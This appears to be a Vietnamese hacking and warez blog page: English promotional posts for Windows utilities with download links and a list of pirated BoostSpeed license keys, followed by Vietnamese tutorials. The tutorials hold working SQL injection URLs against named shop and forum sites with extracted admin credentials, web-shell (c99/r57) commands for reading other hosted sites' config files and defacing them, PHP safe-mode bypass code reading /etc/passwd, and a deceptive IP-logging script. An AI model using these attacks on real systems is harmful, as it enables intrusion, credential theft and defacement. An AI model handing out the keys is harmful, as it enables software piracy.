Screen saving effects
Lock screen transparency - you can view movies under the locked screen
Password protected settings, quit and uninstall
Command line options
and many more

A lot of users believe that Lock My PC (as well as any other third party computer lock software) is useless because Windows XP has integrated computer lock feature.

Standard Windows XP computer lock
Standard Windows XP lock screen

Well, indeed, you can simply press Win+L on Windows XP computer keyboard and your screen will be safely locked. What advantages Lock My PC has over Windows computer lock?

First of all, when your computer is locked by Windows Lock feature, anyone who has Windows Administrative privileges can unlock your computer. Such unlock will force to close your session (all unsaved changes will be lost). If Welcome screen option is enabled on your computer (the default settings for non-domain computer), Win+L doesn't lock the computer at all - it temporary switches the user off and displays the welcome screen - if you share your computer with others, they can logon with their usernames and use your computer. Moreover, if you share your account with other users (it's common for home PC), Windows XP lock feature is useless at all - your folks will unlock your computer without any problem.

Another benefits of Lock My PC in comare with Windows lock feature:

Custom lock screens and transparent lock screen options - your computer can be used as a presentation machine - the screen displays pictures or video, but nobody can touch your computer;
Secure Lock before Windows welcome/logon screen;
Displaying unsuccesfull unlock attempts - you will be notified if anyone tried to unlock your computer;
If Lock My PC is used in muilti-user mode, a supervisor can unlock the computer without closing user session;
You can lock CD/DVD ROM doors along with the desktop, keyboard and mouse - this can prevent CD media from being stolen while you are out;
Command line support allows you to use Lock My PC in Internet kiosks.

Lock My PC provides reliable locking mechanism that impossible to bypass:

Keyboard driver installed with Lock My PC blocks different key combinations like Ctrl+Alt+Del, Alt+Tab, Ctrl+Esc and many others.

Booletproof startup lock ("Always lock at startup" option) displays password prompt box before Windows logon/welcome screen and (unlikle the most of desktop locking software) bannot be bypassed in Windows safe mode.

As soon as the installation completed, double click on the Lock My PC tray icon to lock the computer.

Right click on the tray icon to get access to the program settings. All settings are groupped by cathegoriies.

Lock My PC settings dialog

You can set up Lock My PC to lock your desktop automatically if the computer is idle during a certain period of time. Moreover you can set up Lock My PC to switch the computer off (Hibernate, Standby etc.) if your computer was locked during a certain period of time.

Lock My PC can work in stealth mode. Stealth mode is a state when the program is running on your computer but does not show any sign of its presence in memory. To activate stealth mode, enable options "Do not show tray icon at startup" and "Hide Lock My PC from Task Manager".

Lock My PC can be used both in single-user and multi-user environment. During the installation process, you will instruct Setup wehter to install Lock My PC in single-user mode or in multi-user mode.

In single-user mode, Setup will create Lock My PC shortcuts only for you. Locked computer can be unlocked only with your password. Some advanced options for corporate use will be blocked. This mode is ideal for home use.

In multi-user mode, Setup will create Lock My PC shortcuts for all user accounts. Each Lock My PC user will have their own password. The user who installed Lock My PC will be Lock My PC Administrator and his/her password - the administator's password. This mode is ideal for corporate use.

Lock My PC comes with a set of different lock screens. Lock screens are located in LockScreens subfolder of Lock My PC program folder.

Examples of lock screens.

You can create your own Lock Screen pictures and use them with Lock My PC. Your computer will look cool and unique when it is locked. You can use GIF, JPEG, BMP and animated GIF images as lock screens. Lock Screen transparency level option will allow you to vary the transparency from fully opaque to fully transparent. The latter allows you to lock keyboard and mouse only and may be helpful when you are watching videos or running presentations on your PC.

Download :

http://www.mediafire.com/?9mfjggdnznz

ĐỌC THÊM !!!!

FinalData Product Information
FinalData 2.0 empowers users with the ability to recover lost data on their own, and in private-whether the loss is due to accident, equipment problems, or intentional acts like virus attacks. All FinalData products are easy to use, work across a wide array of media, and do not require prior installation to be effective. The intuitive interface and pow4erful recovery algorithms give users the power to selectively choose what is recovered, as quickly as possible, and with a high degree of confidence that their data will soon be restored.
Next Generation Data Recovery
Winner--Best Performance Award--Data Recovery Software
(awarded to FinalData 1.0)

FinalData Recovers Damaged and Lost Files
• Emptied Recycle Bin
• PC viruses
• Damaged hard-drive partitions
• Software failures
• Damaged system files
• Partitions deleted by FDISK
• Formatted drives
• Power outages and failures..
• Nearly all drive types are supported, including floppy, SCSI®, IDE/EIDE/ATA, CD-ROM, CD-R, CD-RW, DVD-ROM, DVD-RAM, Zip®, Jaz®, CompactFlash®, SmartMedia®, and other digital media drives

DLink + Serial Good

ĐỌC THÊM !!!!

Full service for your FLV video files

>> GetFLV is a totally integrated suite of powerful utilities to download, manage, convert, repair and play FLV video files (Flash video).
>> FLV Downloader: A powerful tool to download FLV from all video sharing sites with the technologies of automatic URL-parsing.
>> FLV to Video Converter: Convert FLV files to popular video formats. It lets you convert FLV to AVI, MPEG, MP4, 3GP, MOV, WMV and etc.
>> FLV Audio Ripper: Extract FLV Audio to popular audio format. It lets you convert FLV to MP3, WMA, WAV, AAC and etc.
>> Video to FLV Converter: A professional conversion tool to convert video to FLV. It supports almost all types of video formats such as MPEG, AVI, WMV, MOV, ASF, MP4, 3GP and etc.
>> FLV Fixer: Repair the FLV video files that can't be seeked.
>> More FLV utilities will be added.

link download:

http://www.mediafire.com/?ee9gcxtpwzn

ĐỌC THÊM !!!!

Download Accelerator Plus (DAP) will accelerate the speed with which you can receive files over the Internet using FTP and HTTP protocols by simultaneously downloading several file segments from the same or different servers.

Download Accelerator Plus enables you to pause and resume downloads, and to recover from a dropped Internet connection.

In addition, DAP searches for mirrors and implements the downloads from the best or most responsive mirrors. It is configured by default to automatically Integrate into your Explorer or Netscape browser when it is installed, and to self-activate each time a download is performed.

Full Speed AND Security! Only with Download Accelerator Plus 8.5 !
Up to 400% faster downloads!
Get the ultimate speed with up to 10 connections per download!
DAP Premium privacy suite ensures your download activity remains discreet!
Direct download with fewer windows for extensive downloaders.
While downloading Zip files see what they contain!
And more . . .
Supported Browsers IE 7.x | 5.x | 6.x Netscape 6.x | 7.x Opera 5 | 6 Mozilla | Firefox
Supported Platforms Windows 98 / ME / XP / NT4 / 2000 / Windows Vista

* New security check by ZoneAlarm for every site & application you download!
* New Tabbed downloading!
* Up to 400% faster downloads.
* Resume broken downloads!
* Preview files while you download.
* NEW and improved interface!
* Daily downloads recommended by DAP users!

Download:

http://www.mediafire.com/?b1znjwv1m1y

ĐỌC THÊM !!!!

AusLogics BoostSpeed 4.1.4.133 Labels: Softwares | 0 comments

boost speed of your PC in just a few minutes
speed up Internet for faster browsing and downloads
clean the registry to make your computer more stable
clean the disks of your PC for higher system performance
boost programs such as MS Office, Media Player, etc.

AusLogics BoostSpeed - the ideal solution to keep your PC running faster, cleaner and error-free. This powerful optimization suite will boost Internet connections, tweak Windows to its peak performance, clean registry and block annoying ads. It's a great way to keep your computer clean and optimized. Speed Up PC With BoostSpeed

Modify Windows settings, file system and services to greatly increase system performance. Increase startup and shutdown speed, disable annoying CD autorun and error reporting features. BoostSpeed will keep monitoring your system for possible optimizations and let you know if such optimizations are possible. You can also run the System Optimization Wizard to periodically optimize your PC.

Speed Up Internet

Adjust your PC for faster images, music and software downloads, increased browsing speed and reliable Internet connections. View your download speed and graphs. To gain additional performance boost you can also turn on DNS Optimization.

Block Banner Advertisements

Tired of annoying banner advertisements accompanying many web sites? Now you can eliminate advertisements and also speed up your Internet browsing with BoostSpeed Banner Killer! You can add your own web sites to the black list to block them from showing their advertisements.

Keep Disk and Registry Clean

Get rid of junk on the disks and registry of your PC. Remove hazardous and space-wasting files left by untidy programs and crashes of your system. Dramatically increase the performance of your PC by cleaning, optimizing and defragmenting local disks and registry.

Optimize Memory and Appearance

Badly written applications constantly steal memory without giving it back. That's why your PC becomes unstable with time and you have to reboot. BoostSpeed automatically frees up computer memory to gain additional performance boost. You can also manually recover memory and clipboard.

Keep your PC fast and safe

BoostSpeed will detect most of the popular "PC-slowers" - bundle-software (such as eDonkey or Kazaa) which silently download malware and spyware to your computer, taking up internet traffic and slowing down the system. This will also keep your system safe from prying eyes of spyware programs.

Boost Software Products

BoostSpeed can improve performance of different software products, including Microsoft Office, Internet browsers (such as Internet Explorer, Opera, Mozzila), E-mail clients (Outlook, The Bat), MSN Messenger, ICQ, Media Player and others.

System Optimization Tools

Greatly increase your PC startup speed with Autorun Manager, where you can disable or remove the programs which try to load up when Windows starts up. Force-uninstall unwanted software products which take up space on your computer and slow it down.

Networks Tools

Keep your connection alive while you're away, synchronize your computer clock with atomic clock over the Internet, lookup domain names and IP addresses, measure your Internet connection speed. Troubleshoot and improve your Internet connection and local network with an excellent selection of network management tools.

Compatible with Windows 98/ME/ 2000/XP/2003/Vista
Changes in Version 4.1.4.133 (06/20/2008):

Added a tray icon, that shows current CPU load, memory load and Internet traffic
Popup window is now substantially improved. Now it shows the most resourceheavy processes
improved error processing in Live Update. Now the program is going to advise you on how to solve the problems
backup copies of files and registry keys that are going to be deleted are now created faster
Disk Defrag and Integrator now take less time to load
fixed a bug in Registry Cleaner, that caused incorrect problems identification in "Icons"
fixed a bug in program registration window and "About the Program", that sometimes appeared on twoscreen systems
fixed rare invalid internal program links error
improved last page of Disk Defrag interface
fixed a number of tweaks in Tweak Manager
now BoostSpeed supports Maya 2008
fixed errors that caused sudden tray icon shutdown
improved OS Protector interface
fixed errors that caused inadequate list processing in several package tools
now the lists (e.g. in System Information) are scrolled correctly
fixed all identified bugs that caused sudden programs shutdowns
German version of the program is now available (download the language file via Live Update)
fixed errors in language files
fixed an Installer bug, that sometimes caused installation errors
minor interface fixes.

Size:4.09MB

Download

Key list :

74DE-BC70-C975-756B-3BF6-2A3C-C889-6500-C84F
74DE-BC70-C975-2D43-7593-33B9-DCAB-DA20-07EE
74DE-BC70-C975-4D65-F23E-49E0-4D87-C2A7-52D9
74DE-BC70-C975-96BC-0F49-4812-5516-92E0-D4FD
74DE-BC70-C975-4D2D-79C1-D6C0-1C01-5645-B194
74DE-BC70-C975-2AEC-CBAF-E202-E0CE-2865-A9E4
74DE-BC70-C975-24C6-CFC6-10E4-6CAE-06AA-6DAB
74DE-BC70-C975-E127-1199-2D94-E3CA-123D-E7AB
74DE-BC70-C975-20E6-2FB7-884F-2DD1-5517-31BC

ĐỌC THÊM !!!!

Bài viết cũ,nhưng vì vẫn còn site bị lỗi này,post lên cho mọi người tham khảo

Từ Khóa : + shopdisplayproducts.asp?id +shopaddtocart.asp?catalogid=

Site thường là dạng VSASP 5.0

Loại lỗi

Đầu tiên kiếm link trước

Code:

http://victim.com/shopping/shopdisplayproducts.asp?id=1

Thêm dấu ' vào thì tâ được:

Microsoft VBScript runtime error '800a000d' Type mismatch: 'clng' /shop/shopproductfeatures.asp, line 139

Giờ tìm link admin

Code:

http://victim.com/shopping/shopdisplayproducts.asp?id=1 or 1=(select%20fieldname%20from%20configuration%20where%20left(fie ldname,10)='xadminpage'%20and%20left(fieldvalue,1) ='a')

Nếu vẫn thấy như cũ thì coi như kí tự đầu tiên trong link shop admin hông phải là a,chọn chữ khác, S chẳng hạn.

Code:

http://victim.com/shopping/shopdisplayproducts.asp?id=1 or 1=(select%20f ieldname%20from%20configuration%20where%20left(fie ldname,10)='xadminpage'%20and%20left(fieldvalue,1) ='s')

Ta được

Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the varchar value 'xadminpage' to a column of data type int.

/shop/shop$db.asp, line 409

-Vậy s là ký tự đâu tien của link admin,tiếp tục thế những chữ khác

Code:

http://victim.com/shopping/shopdisplayproducts.asp?id=1 or1=(select%20f ieldname%20from%20configuration%20where%20left(fie ldname,10)='xadminpage'%20and%20left(fieldvalue,2) ='sh')

Chú ý chỗ này nha (fieldvalue,2)='sh')

-Cứ tiếp tục thay tiếp vào đê tìm ra link admin. Link admin kết thúc = .asp.

Tìm user + pass admin

Code:

http://victim.com/shopping/shopdisplayproducts.asp?id=1 or1=(select%20f ldusername%20from%20tbluser%20where%20admintype='s uper'%20and%20left(fldusername,1)='a')

Microsoft VBScript runtime error '800a000d' Type mismatch: 'clng'

/shop/shopproductfeatures.asp, line 139

Không có gì hết tiếp tục như thế

Code:

http://victim.com/shopping/shopdisplayproducts.asp?id=1 or 1=(select%20f ldusername%20from%20tbluser%20where%20admintype='s uper'%20and%20left(fldusername,1)='c')

Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the varchar value 'circ54' to a column of data type int. /shop/shop$db.asp, line 409

Ok,vậy là ra User rồi đó.

Code:

http://victim.com/shopping/shopdisplayproducts.asp?id=1 or 1=(select%20f
ldusername%20from%20tbluser%20where%20admintype='s uper'%20and%20left(fldusername,2)='ab')

Tìm ký tự thư 2 , thứ 3 thì them vào (fldusername,3)='abc') dậy đó dễ mà. Chúng ta đã có user admin ở trên rồi circ54 tìm pass của nó

Code:

http://victim.com/shopping/shopdisplayproducts.asp?id=1 or 1=(select%20f ldpassword%20from%20tbluser%20where%20fldusername= 'circ54'%20and%20left(fldpassword,1)='a')

Microsoft VBScript runtime error '800a000d' Type mismatch: 'clng' /shop/shopproductfeatures.asp, line 13

Không có gì thì thế cái khác vào.

Code:

http://victim.com/shopping/shopdisplayproducts.asp?id=1 or 1=(select%20f ldpassword%20from%20tbluser%20where%20fldusername= 'circ54'%20and%20left(fldpassword,1)='2')

Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the varchar value '2005HCP' to a column of data type int. /shop/shop$db.asp, line 409

Xong,có đuộc hết tất cả ìno thì vào shop vọc thôi.

Tìm link admin

or%201=(select%20fieldname%20from%20configurati on%20where%20left(fieldname,10)='xadminpage'%20and %20left(fieldvalue,1)='a') => Đoán kí tự đầu

or%201=(select%20fieldname%20from%20configurati on%20where%20left(fieldname,10)='xadminpage'%20and %20left(fieldvalue,1)='a'%20and%20len(fieldvalue)= 15) => Đoán số kí tự (Hông cần cũng được)

Tìm user

or 1=(select fldusername from tbluser where admintype='super' and left(fldusername,1)='a') => Kí tự đầu

or 1=(select fldusername from tbluser where left(fldusername,1)='b' and len(fldusername)=3) => Số kí tự

Tìm pass:

or 1=(select fldpassword from tbluser where fldusername='blue42jh' and left(fldpassword,1)='a') => Kí tự đầu

or 1=(select fldpassword from tbluser where left(fldpassword,1)='b' and len(fldpassword)=3) <== Số kí tự

ĐỌC THÊM !!!!

Method : Exploit
Tool: http://www.google.com

--- Lên cái tool ... gõ key :

Code:

Powered by Jeebles Directory

Thử fang thằng này : http://www.esco.net/highres

Code khai thác ở đây là như sau :

Code:

http://[victim:D]/[đường_dẫn]/download.php?settings2.inc.php

-->

Quote:

http://www.esco.net/highres/download...tings2.inc.php

Nó có kêu mở 1 file để download về, ta cứ làm theo nó đi...

Download xong cái đó rồi thì mở lên ... có cái dòng tuyệt đẹp

Quote:

'admin' => 'xb34dbr34Kerx'

Hết PHIM !

ĐỌC THÊM !!!!

Có nhiều cách để "vượt rào"! Dưới đây là 5 cách bebe tổng hợp lại có hiệu quả nhất
1/ Dùng IP thay cho địa chỉ tên miền
Ví dụ bạn muốn truy cập vào trang web www.ebuddy.combạn hãy ping IP của trangwww.ebuddy.com là 193.238.160.62.
Nhập số IP vừa tìm được ( 193.238.160.62) vào địa chỉ và nhấn Enter để truy cập.

2/ Truy cập bằng giao thức https://
Nếu cách trên không hiệu quả, hãy dùng giao thức https:// (giao thức này dùng để để kết nối an toàn) để truy cập thử nếu website này có hỗ trợ.

3/ Dùng Google Translation làm proxy
Cách này là lợi dụng chương trình dịch thuật cả trang của Google để vào website đó.

Vd: Để vào vhz.vn, vào http://google.com/translate_t, mục Translate a webpage, nhập vào http://vhz.vn/VHC rồi nhấp nút Translate. Kết quả là vào được website.

4/ Dùng Proxy hay Sock, cái này a e ta đều bík, khỏi nói gòy
Để tìm được Proxy tốt thì bebe cung cấp 2 trang web http://proxy-list.org/en/
hay http://www.proxy4free.com /page1.html để tìm!

5/ Dùng các Web proxy

Cách này hiệu quả rất cao. Với các web proxy này, a e có thể chọn tắt hay không hình ảnh, javascript, cookies,...
Danh sách các Proxy:
http://www.proxysurf.org/
http://hexproxy.com/
http://theyhide.us/
Bấm browse để load site là Ok

ĐỌC THÊM !!!!

Step 1: Đăng ký 1 acc ở đó
Step 2: Vô linksite/members.php?folders=1
Step 3: Tạo 1 folder(với tên gì cũng dc)
Step 4: đánh lênh SQL truy xuất database
+)lệnh 1: /members.php?folders=1&fid=-1+union+all+select+1,2,concat(user),pass,5,6,7,8+from+users+-- dể lấy acc+pass list
+)lệnh 2: /members.php?folders=1&fid=-1+union+all+select+1,2,admin,pass,5,6,7,8+from+setting+-- để lấy admin info
+)lệnh 3: /members.php?folders=1&fid=-1+union+all+select+1,2,user,pass,5,6,7,8+from+server+-- để lấy user + pass của ftp server nếu nó cài đặt

Dork để search:"Powered by: MFH v1.2"

ĐỌC THÊM !!!!

----- From hoangduy -----

+thứ 1:
SQL injection thì phân biệt mysql injection và mssql injection là chính
còn php và asp chỉ là vấn đề phụ(gần như giống nhau)...1 số bạn lại nhầm tưởng
+thứ 2:
UNION dùng để kết nối 2 mệnh đề SELECT có hỗ trợ cả mysql và mssql nên có thể xài ở mọi trường hợp
+thứ 3:
mysql kết hợp tốt với php nên thông thường các bạn hack site php chỉ gặp mysql...nhưng ko tuyệt đối là thế mà có thể là mssql,oracle....
+thứ 4:nói thêm (có sai thì mấy pro góp ý)
VD:id=1 các bạn sửa lại thành id=-999 or id=null làm gì?
để mệnh đề SELECT thứ nhất ko trả về kết quả
giả sử trên 1 page có 3 chỗ echo ra kết quả mà SELECT thứ nhất trả về 3 kết quả thì hết chỗ...SELECT thứ 2 tuy trả về kết quả nhưng ko có chỗ echo ra +thứ 5:
cấu trúc UNION:

Code:

SELECT id,user,pass,level from test UNION SELECT 1,'a','b',2 from example

VD trên nghĩa là type các column trong 2 mệnh đề SELECT phải giống nhau

Áp dụng:

Code:

http://www.peric.ac.cn/product.php?product_id=2'

Code:

mssql_query

=> nghĩa là nó sử dụng sql server or mssql
attack = UNION nha
đầu tiên đếm column đc 4 column

Code:

http://www.peric.ac.cn/product.php?product_id=-2 union select 1,2,3,4 from information_schema.tables--

type khác nhau

Code:

http://www.peric.ac.cn/product.php?product_id=-2 union select null,null,null,null from information_schema.tables--

null ko có type nên bypass tốt

Code:

Warning: mssql_query(): message: The text, ntext, or image data type cannot be selected as DISTINCT. (severity 16) in /home/www/peric/product.php on line 262

DISTINCT là gì thì các bạn tự tìm hĩu (đơn giản là lọc kết quả trùng nhau)
để khắc phục thì xài union all select
kế típ dò type từng column

Code:

http://www.peric.ac.cn/product.php?product_id=-2 union all select 1,null,null,null from information_schema.tables--

vẫn bt

=>column type int(thường là ID mà )

Code:

http://www.peric.ac.cn/product.php?product_id=-2 union all select 1,2,null,null from information_schema.tables--

ra số 2 đẹp đẹp

Code:

http://www.peric.ac.cn/product.php?product_id=-2 union all select 1,2,3,null%20from%20information_schema.tables--

báo lỗi nên change thành '3','a',.. gì đó miễn là type char

Code:

http://www.peric.ac.cn/product.php?product_id=-2 union all select 1,2,'3',null from information_schema.tables--

Code:

Warning: mssql_query(): message: Line 1: Incorrect syntax near '\'. (severity 15) in /home/www/peric/product.php on line 262

=> hình như bị magic quote(là gì thì tìm hĩu

)
=>chuyển thành

Code:

http://www.peric.ac.cn/product.php?product_id=-2 union all select 1,2,table_name,null from information_schema.tables--

tương tự

Code:

http://www.peric.ac.cn/product.php?product_id=-2 union all select 1,2,table_name,4 from information_schema.tables--

tiếp theo chắc các bạn bít roài
---hết---
hoangduye

ĐỌC THÊM !!!!

--------- From hoangtan ------------

Hôm nay, vào 1 topic, thấy 1 số bạn vẫn chưa bik local , nên mình mạn phép viết 1 topic, dù mình rất gà, nhưng cũng xin viết tut cho những bạn như mình
ok :
sắn có shell, làm luôn

Code:

http://74.54.136.66/~yeubz/abc/c99.php

mình quen sài shell c99
bây giờ,giả sử như ta chưa có shell đúng hem
muốn attack 1 site có nhiều cách, nhưng những cách sau newbie tụi mình hay làm
1) tìm bug ngay trên victim
2) nếu victim ko có bug, ta tìm site cùng server local chơi
mình đang muốn nói cách 2 trong topic này
giả sử victim của ta ko có bug, làm jì đây
mình whois xem hàng xóm của nó thử coi

Code:

http://crushmachine.com/rip.php?host=74.54.136.66&page=6

chắc chắn các bạn sẽ thấy nhiếu site, ta tìm bug trên từng site,sau đó tìm cách up 1 con r57 or c99 để local
giả sử mình tìm dc 1 thằng này đó có bug, up dc shell. Trong tay có shell, làm jì nhỉ

chơi thoai

Code:

http://74.54.136.66/~yeubz/abc/c99.php

ok, mình bắt đầu với lệnh

Code:

cd /etc/valiases && ls -lia

lệnh này tìm user cùng site của user đó
khi nó hiện ra, ta tìm victim cần local
giả sử ta dùng luôn thằng yeubz ha, mà site này cũng có sex, tui ghét sex lắm . OK , ta dùng lệnh sau

Code:

dir /home/yeubz/public_html/

bạn bik jì về lệnh này, nếu ko bik xin vui lòng đọc tài liệu ok
sau khi ta vào dc thư mục, thì ta thấy các thư mục, các file, tệp, dùng ệnh này để đọc, vidụ như :

Code:

cat //home/yeubz/public_html/abc/config.php

ở đây nếu file ko bị chmod kĩ, thì ta có thể view dc ìno trong đó vd:

Code:

"localhost","port"=>"",
                "user"=>"demo",
                "pass"=>"123456","database"=>"qanh_quanganh");
$common_config=array();
$common_config['product_per_page']="12";
$common_config['member_per_page']="10";
$common_config['guestbook_per_page']="5";
$common_config['support_email']="support@quanganh.com.vn";
$common_config['contact_email']="info@quanganh.com.vn";
$common_config['sales_email']="sales@quanganh.com.vn";
$common_config['axiom_per_member']="10";
$common_config['stories_per_page']="5";
$common_config['page_per_page']="10";
$common_config['diary_per_page']="5";
$common_config['num_free_picture']="10";
$common_config['allow_free_planner']="1";
?>

d0ây là file mình up lên để demo , khi các bạn có info của data, thì mình connect tới SQL, điền đầy đủ thông tin
con các bạn muốn deface, thì mình phải có quyền

Code:

uid=32119(yeubz) gid=32122(yeubz) groups=32122(yeubz)

như thế này, các bạn có thể xóa fiel index để thay = file của mình, mình up dc file ảnh

Code:

http://74.54.136.66/~yeubz/abc/deface.JPG

vậy thui, còn nhiều nữa, mình chỉ dẫn những cái cơ bản thui, khi nào đó rảnh mình làm cái video local basic cho các bạn nha , giờ đang bận thi hk
the end

, đừng chê nha các anh

ĐỌC THÊM !!!!

--------From Night :D------

Bài này Night tập hợp từ nhiều nguồn
hy vọng có ích

Trên r57 shell dùng lệnh :

ls /home/yeutruct/public_html/nhactre/

tiếp tục dùng lệnh ls vào thư mục 4rum/includes :

Ah ha, file config đây rồi, dùng lệnh cat /home/yeutruct/public_html/nhactre/4rum/includes/c onfig.php để xem nội dung :

Ta có được các thông tin về database :

Code:
$config['Database']['dbname'] = 'yeutruct_nhactre';
$config['MasterServer']['username'] = 'yeutruct_nhactre';
$config['MasterServer']['password'] = 'mekiep';

Trên r57 >>> Database >>> Run SQL query điền các thông tin tìm được vào :

Nhấn Execute .

Tiếp tục run SQL command :

Ta sẽ có được toàn bộ các tables trong database này, nhưng hiện tại vấn đề ở đây chúng ta chỉ cần những tables quan trọng :

Tới đây là thấy khỏe khoắn rồi, userid = 1 đích thị là admin .

Theo các bạn thì chúng ta sẽ làm tiếp thế nào đây? VBB sử dụng hash MD5 đã qua xử lý (salted hashed) nên ko thể dùng hash MD5 bình thường để thay thế. Vậy làm sao để đổi password của admin đây nhỉ ?

Hihi đành chịu khó mất thêm tí thời gian vậy , đổi password ko ổn thì ta sẽ đổi email :

Sẵn tiện tay dùng thêm câu lệnh SELECT email FROM user để " thâu tóm " toàn bộ email thành viên diễn đàn này .

Tiếp tục vào forum của trang nhactre.vn và sử dụng chức năng forgot password >>> kết quả tiếp theo :

ĐỌC THÊM !!!!

chúng ta thường local shell qua server cần attack thì chúng ta dùng lệnh cp [path host1 ] [host2]
cp = copy , đơn giản là chúng ta copy cái file shell ở host1 qua host 2 giống như chúng ta dùng lệnh copy 1 tập tin từ hda qua hdb .
còn về Chmod là các phân quyền trong hệ điều hành của máy server, trong linux thì permision sẽ được chia làm nhiều cấp bậc , cao nhất là root , đến owner group , và cuối cùng là đến Other , thường thì nếu các server Chmod kỹ sẽ không cho Other được bất cứ quyền gì.Gowner Group sẽ có được một số quyền hạn giống như root ở một số tập tin, còn Root (gốc rễ, ông vua) là người có toàn quyền trên server.
Và từ đó chúng ta có thể định hình được Chmod chỉ đơn giản là các quyền cho phép đối với người dùng.
Chmod được chia ra làm 4 chế độ:
1. r (read) :Quyền đọc , người được quyền này sẽ đọc được các tập tin nhưng không được viết (sửa đổi ), hoặc thực thi.
2. w (write ) : quyền viết , người có quyền này sẽ có thể sửa đổi các tập tin.
3.x (execute): quyền thực thi.
4. và cuối cùng là _ : tức là không có quyền gì cả = Null
vd : _rwxrwxrwx index.php
tức là tất cả mọi người dùng đều có toàn quyền trên file index.php
_rwxr_xr__ index.php
Chỉ có root (owner) mới được toàn quyền , Owner Group được quyền đọc và thực thi nhưng không được quyền ghi, Other được quyền đọc và thực thi nhưng không được quyền ghi
Nhưng để tiện hơn trong việc phân quyền thì người ta gán cho chúng những con số .
r = 4
w = 2
x = 1
như vậy nếu 1 file được chmod 755 tức file đó sẽ tương đương _rwxr_xr_x

_cách bypass bằng mysql chỉ dùng với user nobody , vì với các user bt thì thường mysql nó phân quyền ko truy cập File qua lẫn nhau đc

_khi sv bật cURL On : ta có thể Eval đoạn php code sau để view File , vd:

1/ $ch = curl_init("file:///home/user/public_html/config.php\x00/../../../../../../../../../../../../".__FILE__); curl_exec($ch);2/ $ch = curl_init("file:///etc/passwd\x00".__FILE__); curl_exec($ch); var_dump(curl_exec($ch));_ko Dis fopen

$fd = fopen ("/home/user/public_html/config.php", "r"); while (!feof ($fd)) { $line = fgets($fd,4000); print $line; } fclose ($fd);_
copy("compress.zlib:///etc/passwd", "/home/user/public_html/somePATH/writeableFOLDER/passwd.txt");quy định đuờng dẫn save file passwd mà ta có quyền ghi

_dùng hàm gzfile, readgzfile, gzopen nữa, chức năng nó tương tự như các hàm file, readfile, fopen

_Nếu gặp trường hợp SV bật Safe-Mode và có thể là Disable một số hàm quan trọng:
Xem xét lại nếu SV cho phép upload hoặc tạo thư mục mới hay ko( chú í tới uid nếu uid=owner thì ổn cả).
Tạo 1 thư mục mới và chmod cho nó là 775( dùng để up con cgitenet.pl).Đây là con shell dùng perll script nên dù Safe-Mode hay dis các hàm php thì cũng không ảnh hưởng gì tới các chức năng script của con perl này.
Up con cgitenet.pl này lên host của victim ( nên dùng shell là r57 ) .Trong phần Download files from remote ftp-server của con r57 điền thông tin con cgitenet.pl trên host của ta vào( host chứa perl shell của mình phải hỗ trợ upload qua FTP )
FTP-server:
Login:
Password:
File on ftp:
Local file:
Transfer mode: ASCII

Chú ý : riêng con perl shell này thì Get về host victim phải chọn chế độ ASCII
chmod lại cho cgitenet.pl lại thành 775.
Sau đó chạy shell cgitenet.pl trên SV của victim là ổn .

ĐỌC THÊM !!!!

Hôm nay rảnh rang, StuN bày cho anh em bí quyết check IP của đối phương trong khi chat... và đối với các bạn hay làm forum mà chỉ muốn có người VN vào thôi thì đây là một cách cực kỳ hữu hiệu

Bạn lưu đoạn code bày vào notepad rồi save với: *.php(đổi mail thành mail của bạn).

Sau đó up lên host----> vấn đề bây giờ là thằng Tây nào vào hỏi pass các bạn cứ việc quăng link file *.php, nói với nó đây là pass, mày muốn thì vào đó lấy.Sau khi thằng Tây click vào đó, bạn vào check mail ngay, sẽ thấy IP của thằng đó trong mail của mình---> trace ip để biết thông tin về nước nó đang ở----> Ban(cứ nước ngoài là ban tất).

Code :

percorsoDatabase="/database/DBSit
$ip = $REMOTE_ADDR;
$host = gethostbyaddr($ip);
$date = date("d/m/Y H:i:s");
$email = "mail của các bạn để ở đây(tốt nhất là gmail)";
$sujet = "Ip + Host";
$message = "<html><body>Moment : $date<br>Ip : $ip<br>Host : $host</body></html>";
if(mail($email,$sujet,$message,"Content-Type: text/html")){
echo "Ownneeed";}
else { echo "Shit ?";}o.mdb"

ĐỌC THÊM !!!!

FTP: Là từ viết tắt của “File Transfer Protocol”. Đây là giao thức truyền file trên mạng dựa theo chuẩn TCP, thường dùng để để upload file lên Host, Server với cổng mặc định là 21
Cú pháp : ftp
Cú Pháp : ping www.tentrangweb.com hoặc ping diachiIP -t (vd: ping 203.162.0.11 -t)
Traceroute: Là chương trình cho phép bạn xác định được đường đi của các gói tin (packet) từ máy bạn đến hệ thống đích trên mạng Internet.
Cú pháp : tracert IPhost
Ví dụ : tracert 203.162.0.11

ICMP: Là chữ viết tắt của “Internet Control Message Protocol”. Đây là giao thức xử lý các thông báo trạng thái cho IP. ICMP được dùng để thông báo các lỗi xảy ra trong quá trình truyền đi của các gói dữ liệu trên mạng. ICMP thuộc tầng vận chuyển (Transport Layer).

Telnet: Là một chương trình terminal đầu cuối. Nó thường dùng để đăng nhập vào một máy chủ nào đó trên các daemon khác nhau của máy chủ đó. Bạn có thể thu thập một số thông tin về máy chủ qua telnet. Bạn cũng có thể check mail, gởi mail và đặc biệt là có thể tham gia vào các kênh chat IRC của nước ngoài.
Cú pháp : telnet RFC
Là từ viết tắt của “Request For Comment”. Đây là tập hợp những tài liệu về kiến nghị, đề xuất và những lời bình luận liên quan trực tiếp hoặc gián tiếp đến công nghệ, nghi thức mạng INTERNET. Các tài liệu RFC đựợc chỉnh sửa, thay đổi đến khi tất cả các kỹ sư thành viên của IETF (Internet Engineering Task Force) đồng ý và duyệt, sau đó những tài liệu này được xuất bản và được công nhận là một chuẩn, nghi thức cho Internet.

DNS: Là từ viết tắt của “Domain Name System” (Hệ thống tên miền). Một máy chủ DNS đợi kết nối ở cổng số 53, có nghĩa là nếu bạn muốn kết nối vào máy chủ đó, bạn phải kết nối đến cổng số 53. Máy chủ chạy DNS chuyển hostname bằng các chữ cái thành các chữ số tương ứng và ngược lại.
Ví dụ : 127.0.0.1 –> localhost và localhost—>127.0.0.1 (127.0.0.1 là địa chỉ của chính máy bạn đang dùng, hay còn gọi là địa chỉ “loopback”)

SMTP: Là từ viết tắt của “Simple Message Transfer Protocol”. Giao thức SMTP dùng để gửi thư thông qua một chương trình Sendmail (Sendmail Deamon), tuy phổ biến nhưng kém an toàn.

